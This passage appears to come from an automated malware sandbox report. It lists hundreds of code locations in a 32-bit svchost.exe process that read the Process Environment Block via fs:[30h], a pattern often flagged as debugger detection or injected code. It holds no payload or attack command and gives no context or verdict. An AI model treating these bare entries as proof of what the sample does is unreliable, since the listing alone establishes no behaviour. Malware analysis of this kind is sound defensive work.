            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346C720 mov eax, dword ptr fs:[00000030h]2_2_0346C720
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346C720 mov eax, dword ptr fs:[00000030h]2_2_0346C720
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346273C mov eax, dword ptr fs:[00000030h]2_2_0346273C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346273C mov ecx, dword ptr fs:[00000030h]2_2_0346273C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346273C mov eax, dword ptr fs:[00000030h]2_2_0346273C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034AC730 mov eax, dword ptr fs:[00000030h]2_2_034AC730
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0343C7C0 mov eax, dword ptr fs:[00000030h]2_2_0343C7C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B07C3 mov eax, dword ptr fs:[00000030h]2_2_034B07C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034527ED mov eax, dword ptr fs:[00000030h]2_2_034527ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034527ED mov eax, dword ptr fs:[00000030h]2_2_034527ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034527ED mov eax, dword ptr fs:[00000030h]2_2_034527ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034BE7E1 mov eax, dword ptr fs:[00000030h]2_2_034BE7E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034347FB mov eax, dword ptr fs:[00000030h]2_2_034347FB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034347FB mov eax, dword ptr fs:[00000030h]2_2_034347FB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034D678E mov eax, dword ptr fs:[00000030h]2_2_034D678E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034307AF mov eax, dword ptr fs:[00000030h]2_2_034307AF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034E47A0 mov eax, dword ptr fs:[00000030h]2_2_034E47A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0344C640 mov eax, dword ptr fs:[00000030h]2_2_0344C640
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034F866E mov eax, dword ptr fs:[00000030h]2_2_034F866E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034F866E mov eax, dword ptr fs:[00000030h]2_2_034F866E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346A660 mov eax, dword ptr fs:[00000030h]2_2_0346A660
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346A660 mov eax, dword ptr fs:[00000030h]2_2_0346A660
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03462674 mov eax, dword ptr fs:[00000030h]2_2_03462674
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034AE609 mov eax, dword ptr fs:[00000030h]2_2_034AE609
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0344260B mov eax, dword ptr fs:[00000030h]2_2_0344260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0344260B mov eax, dword ptr fs:[00000030h]2_2_0344260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0344260B mov eax, dword ptr fs:[00000030h]2_2_0344260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0344260B mov eax, dword ptr fs:[00000030h]2_2_0344260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0344260B mov eax, dword ptr fs:[00000030h]2_2_0344260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0344260B mov eax, dword ptr fs:[00000030h]2_2_0344260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0344260B mov eax, dword ptr fs:[00000030h]2_2_0344260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03472619 mov eax, dword ptr fs:[00000030h]2_2_03472619
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0344E627 mov eax, dword ptr fs:[00000030h]2_2_0344E627
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03466620 mov eax, dword ptr fs:[00000030h]2_2_03466620
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03468620 mov eax, dword ptr fs:[00000030h]2_2_03468620
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0343262C mov eax, dword ptr fs:[00000030h]2_2_0343262C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346A6C7 mov ebx, dword ptr fs:[00000030h]2_2_0346A6C7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346A6C7 mov eax, dword ptr fs:[00000030h]2_2_0346A6C7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034AE6F2 mov eax, dword ptr fs:[00000030h]2_2_034AE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034AE6F2 mov eax, dword ptr fs:[00000030h]2_2_034AE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034AE6F2 mov eax, dword ptr fs:[00000030h]2_2_034AE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034AE6F2 mov eax, dword ptr fs:[00000030h]2_2_034AE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B06F1 mov eax, dword ptr fs:[00000030h]2_2_034B06F1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B06F1 mov eax, dword ptr fs:[00000030h]2_2_034B06F1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03434690 mov eax, dword ptr fs:[00000030h]2_2_03434690
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03434690 mov eax, dword ptr fs:[00000030h]2_2_03434690
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346C6A6 mov eax, dword ptr fs:[00000030h]2_2_0346C6A6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034666B0 mov eax, dword ptr fs:[00000030h]2_2_034666B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03438550 mov eax, dword ptr fs:[00000030h]2_2_03438550
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03438550 mov eax, dword ptr fs:[00000030h]2_2_03438550
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346656A mov eax, dword ptr fs:[00000030h]2_2_0346656A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346656A mov eax, dword ptr fs:[00000030h]2_2_0346656A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346656A mov eax, dword ptr fs:[00000030h]2_2_0346656A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034C6500 mov eax, dword ptr fs:[00000030h]2_2_034C6500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03504500 mov eax, dword ptr fs:[00000030h]2_2_03504500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03504500 mov eax, dword ptr fs:[00000030h]2_2_03504500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03504500 mov eax, dword ptr fs:[00000030h]2_2_03504500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03504500 mov eax, dword ptr fs:[00000030h]2_2_03504500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03504500 mov eax, dword ptr fs:[00000030h]2_2_03504500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03504500 mov eax, dword ptr fs:[00000030h]2_2_03504500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03504500 mov eax, dword ptr fs:[00000030h]2_2_03504500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03440535 mov eax, dword ptr fs:[00000030h]2_2_03440535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03440535 mov eax, dword ptr fs:[00000030h]2_2_03440535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03440535 mov eax, dword ptr fs:[00000030h]2_2_03440535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03440535 mov eax, dword ptr fs:[00000030h]2_2_03440535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03440535 mov eax, dword ptr fs:[00000030h]2_2_03440535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03440535 mov eax, dword ptr fs:[00000030h]2_2_03440535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0345E53E mov eax, dword ptr fs:[00000030h]2_2_0345E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0345E53E mov eax, dword ptr fs:[00000030h]2_2_0345E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0345E53E mov eax, dword ptr fs:[00000030h]2_2_0345E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0345E53E mov eax, dword ptr fs:[00000030h]2_2_0345E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0345E53E mov eax, dword ptr fs:[00000030h]2_2_0345E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346E5CF mov eax, dword ptr fs:[00000030h]2_2_0346E5CF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346E5CF mov eax, dword ptr fs:[00000030h]2_2_0346E5CF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034365D0 mov eax, dword ptr fs:[00000030h]2_2_034365D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346A5D0 mov eax, dword ptr fs:[00000030h]2_2_0346A5D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346A5D0 mov eax, dword ptr fs:[00000030h]2_2_0346A5D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0345E5E7 mov eax, dword ptr fs:[00000030h]2_2_0345E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0345E5E7 mov eax, dword ptr fs:[00000030h]2_2_0345E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0345E5E7 mov eax, dword ptr fs:[00000030h]2_2_0345E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0345E5E7 mov eax, dword ptr fs:[00000030h]2_2_0345E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0345E5E7 mov eax, dword ptr fs:[00000030h]2_2_0345E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0345E5E7 mov eax, dword ptr fs:[00000030h]2_2_0345E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0345E5E7 mov eax, dword ptr fs:[00000030h]2_2_0345E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0345E5E7 mov eax, dword ptr fs:[00000030h]2_2_0345E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034325E0 mov eax, dword ptr fs:[00000030h]2_2_034325E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346C5ED mov eax, dword ptr fs:[00000030h]2_2_0346C5ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346C5ED mov eax, dword ptr fs:[00000030h]2_2_0346C5ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03432582 mov eax, dword ptr fs:[00000030h]2_2_03432582
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03432582 mov ecx, dword ptr fs:[00000030h]2_2_03432582
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03464588 mov eax, dword ptr fs:[00000030h]2_2_03464588
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346E59C mov eax, dword ptr fs:[00000030h]2_2_0346E59C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B05A7 mov eax, dword ptr fs:[00000030h]2_2_034B05A7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B05A7 mov eax, dword ptr fs:[00000030h]2_2_034B05A7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B05A7 mov eax, dword ptr fs:[00000030h]2_2_034B05A7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034545B1 mov eax, dword ptr fs:[00000030h]2_2_034545B1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034545B1 mov eax, dword ptr fs:[00000030h]2_2_034545B1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346E443 mov eax, dword ptr fs:[00000030h]2_2_0346E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346E443 mov eax, dword ptr fs:[00000030h]2_2_0346E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346E443 mov eax, dword ptr fs:[00000030h]2_2_0346E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346E443 mov eax, dword ptr fs:[00000030h]2_2_0346E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346E443 mov eax, dword ptr fs:[00000030h]2_2_0346E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346E443 mov eax, dword ptr fs:[00000030h]2_2_0346E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346E443 mov eax, dword ptr fs:[00000030h]2_2_0346E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346E443 mov eax, dword ptr fs:[00000030h]2_2_0346E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034EA456 mov eax, dword ptr fs:[00000030h]2_2_034EA456
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0342645D mov eax, dword ptr fs:[00000030h]2_2_0342645D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0345245A mov eax, dword ptr fs:[00000030h]2_2_0345245A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034BC460 mov ecx, dword ptr fs:[00000030h]2_2_034BC460
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0345A470 mov eax, dword ptr fs:[00000030h]2_2_0345A470
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0345A470 mov eax, dword ptr fs:[00000030h]2_2_0345A470
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0345A470 mov eax, dword ptr fs:[00000030h]2_2_0345A470
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03468402 mov eax, dword ptr fs:[00000030h]2_2_03468402
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03468402 mov eax, dword ptr fs:[00000030h]2_2_03468402
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03468402 mov eax, dword ptr fs:[00000030h]2_2_03468402
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0342E420 mov eax, dword ptr fs:[00000030h]2_2_0342E420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0342E420 mov eax, dword ptr fs:[00000030h]2_2_0342E420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0342E420 mov eax, dword ptr fs:[00000030h]2_2_0342E420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0342C427 mov eax, dword ptr fs:[00000030h]2_2_0342C427
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B6420 mov eax, dword ptr fs:[00000030h]2_2_034B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B6420 mov eax, dword ptr fs:[00000030h]2_2_034B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B6420 mov eax, dword ptr fs:[00000030h]2_2_034B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B6420 mov eax, dword ptr fs:[00000030h]2_2_034B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B6420 mov eax, dword ptr fs:[00000030h]2_2_034B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B6420 mov eax, dword ptr fs:[00000030h]2_2_034B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B6420 mov eax, dword ptr fs:[00000030h]2_2_034B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346A430 mov eax, dword ptr fs:[00000030h]2_2_0346A430
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034304E5 mov ecx, dword ptr fs:[00000030h]2_2_034304E5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034EA49A mov eax, dword ptr fs:[00000030h]2_2_034EA49A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034364AB mov eax, dword ptr fs:[00000030h]2_2_034364AB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034644B0 mov ecx, dword ptr fs:[00000030h]2_2_034644B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034BA4B0 mov eax, dword ptr fs:[00000030h]2_2_034BA4B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034E4B4B mov eax, dword ptr fs:[00000030h]2_2_034E4B4B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034E4B4B mov eax, dword ptr fs:[00000030h]2_2_034E4B4B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03502B57 mov eax, dword ptr fs:[00000030h]2_2_03502B57
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03502B57 mov eax, dword ptr fs:[00000030h]2_2_03502B57
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03502B57 mov eax, dword ptr fs:[00000030h]2_2_03502B57
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03502B57 mov eax, dword ptr fs:[00000030h]2_2_03502B57
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034C6B40 mov eax, dword ptr fs:[00000030h]2_2_034C6B40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034C6B40 mov eax, dword ptr fs:[00000030h]2_2_034C6B40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034FAB40 mov eax, dword ptr fs:[00000030h]2_2_034FAB40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034D8B42 mov eax, dword ptr fs:[00000030h]2_2_034D8B42
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03428B50 mov eax, dword ptr fs:[00000030h]2_2_03428B50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034DEB50 mov eax, dword ptr fs:[00000030h]2_2_034DEB50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0342CB7E mov eax, dword ptr fs:[00000030h]2_2_0342CB7E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03504B00 mov eax, dword ptr fs:[00000030h]2_2_03504B00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034AEB1D mov eax, dword ptr fs:[00000030h]2_2_034AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034AEB1D mov eax, dword ptr fs:[00000030h]2_2_034AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034AEB1D mov eax, dword ptr fs:[00000030h]2_2_034AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034AEB1D mov eax, dword ptr fs:[00000030h]2_2_034AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034AEB1D mov eax, dword ptr fs:[00000030h]2_2_034AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034AEB1D mov eax, dword ptr fs:[00000030h]2_2_034AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034AEB1D mov eax, dword ptr fs:[00000030h]2_2_034AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034AEB1D mov eax, dword ptr fs:[00000030h]2_2_034AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034AEB1D mov eax, dword ptr fs:[00000030h]2_2_034AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0345EB20 mov eax, dword ptr fs:[00000030h]2_2_0345EB20
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0345EB20 mov eax, dword ptr fs:[00000030h]2_2_0345EB20
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034F8B28 mov eax, dword ptr fs:[00000030h]2_2_034F8B28
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034F8B28 mov eax, dword ptr fs:[00000030h]2_2_034F8B28
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03450BCB mov eax, dword ptr fs:[00000030h]2_2_03450BCB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03450BCB mov eax, dword ptr fs:[00000030h]2_2_03450BCB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03450BCB mov eax, dword ptr fs:[00000030h]2_2_03450BCB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03430BCD mov eax, dword ptr fs:[00000030h]2_2_03430BCD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03430BCD mov eax, dword ptr fs:[00000030h]2_2_03430BCD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03430BCD mov eax, dword ptr fs:[00000030h]2_2_03430BCD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034DEBD0 mov eax, dword ptr fs:[00000030h]2_2_034DEBD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03438BF0 mov eax, dword ptr fs:[00000030h]2_2_03438BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03438BF0 mov eax, dword ptr fs:[00000030h]2_2_03438BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03438BF0 mov eax, dword ptr fs:[00000030h]2_2_03438BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0345EBFC mov eax, dword ptr fs:[00000030h]2_2_0345EBFC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034BCBF0 mov eax, dword ptr fs:[00000030h]2_2_034BCBF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03440BBE mov eax, dword ptr fs:[00000030h]2_2_03440BBE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03440BBE mov eax, dword ptr fs:[00000030h]2_2_03440BBE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034E4BB0 mov eax, dword ptr fs:[00000030h]2_2_034E4BB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034E4BB0 mov eax, dword ptr fs:[00000030h]2_2_034E4BB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03436A50 mov eax, dword ptr fs:[00000030h]2_2_03436A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03436A50 mov eax, dword ptr fs:[00000030h]2_2_03436A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03436A50 mov eax, dword ptr fs:[00000030h]2_2_03436A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03436A50 mov eax, dword ptr fs:[00000030h]2_2_03436A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03436A50 mov eax, dword ptr fs:[00000030h]2_2_03436A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03436A50 mov eax, dword ptr fs:[00000030h]2_2_03436A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03436A50 mov eax, dword ptr fs:[00000030h]2_2_03436A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03440A5B mov eax, dword ptr fs:[00000030h]2_2_03440A5B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03440A5B mov eax, dword ptr fs:[00000030h]2_2_03440A5B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346CA6F mov eax, dword ptr fs:[00000030h]2_2_0346CA6F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346CA6F mov eax, dword ptr fs:[00000030h]2_2_0346CA6F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346CA6F mov eax, dword ptr fs:[00000030h]2_2_0346CA6F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034DEA60 mov eax, dword ptr fs:[00000030h]2_2_034DEA60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034ACA72 mov eax, dword ptr fs:[00000030h]2_2_034ACA72
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034ACA72 mov eax, dword ptr fs:[00000030h]2_2_034ACA72
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034BCA11 mov eax, dword ptr fs:[00000030h]2_2_034BCA11
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346CA24 mov eax, dword ptr fs:[00000030h]2_2_0346CA24
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0345EA2E mov eax, dword ptr fs:[00000030h]2_2_0345EA2E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03454A35 mov eax, dword ptr fs:[00000030h]2_2_03454A35
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03454A35 mov eax, dword ptr fs:[00000030h]2_2_03454A35
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346CA38 mov eax, dword ptr fs:[00000030h]2_2_0346CA38
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03486ACC mov eax, dword ptr fs:[00000030h]2_2_03486ACC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03486ACC mov eax, dword ptr fs:[00000030h]2_2_03486ACC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03486ACC mov eax, dword ptr fs:[00000030h]2_2_03486ACC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03430AD0 mov eax, dword ptr fs:[00000030h]2_2_03430AD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03464AD0 mov eax, dword ptr fs:[00000030h]2_2_03464AD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03464AD0 mov eax, dword ptr fs:[00000030h]2_2_03464AD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346AAEE mov eax, dword ptr fs:[00000030h]2_2_0346AAEE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346AAEE mov eax, dword ptr fs:[00000030h]2_2_0346AAEE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0343EA80 mov eax, dword ptr fs:[00000030h]2_2_0343EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0343EA80 mov eax, dword ptr fs:[00000030h]2_2_0343EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0343EA80 mov eax, dword ptr fs:[00000030h]2_2_0343EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0343EA80 mov eax, dword ptr fs:[00000030h]2_2_0343EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0343EA80 mov eax, dword ptr fs:[00000030h]2_2_0343EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0343EA80 mov eax, dword ptr fs:[00000030h]2_2_0343EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0343EA80 mov eax, dword ptr fs:[00000030h]2_2_0343EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0343EA80 mov eax, dword ptr fs:[00000030h]2_2_0343EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0343EA80 mov eax, dword ptr fs:[00000030h]2_2_0343EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03504A80 mov eax, dword ptr fs:[00000030h]2_2_03504A80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03468A90 mov edx, dword ptr fs:[00000030h]2_2_03468A90
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03438AA0 mov eax, dword ptr fs:[00000030h]2_2_03438AA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03438AA0 mov eax, dword ptr fs:[00000030h]2_2_03438AA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03486AA4 mov eax, dword ptr fs:[00000030h]2_2_03486AA4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B0946 mov eax, dword ptr fs:[00000030h]2_2_034B0946
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03504940 mov eax, dword ptr fs:[00000030h]2_2_03504940
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03456962 mov eax, dword ptr fs:[00000030h]2_2_03456962
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03456962 mov eax, dword ptr fs:[00000030h]2_2_03456962
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03456962 mov eax, dword ptr fs:[00000030h]2_2_03456962
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0347096E mov eax, dword ptr fs:[00000030h]2_2_0347096E
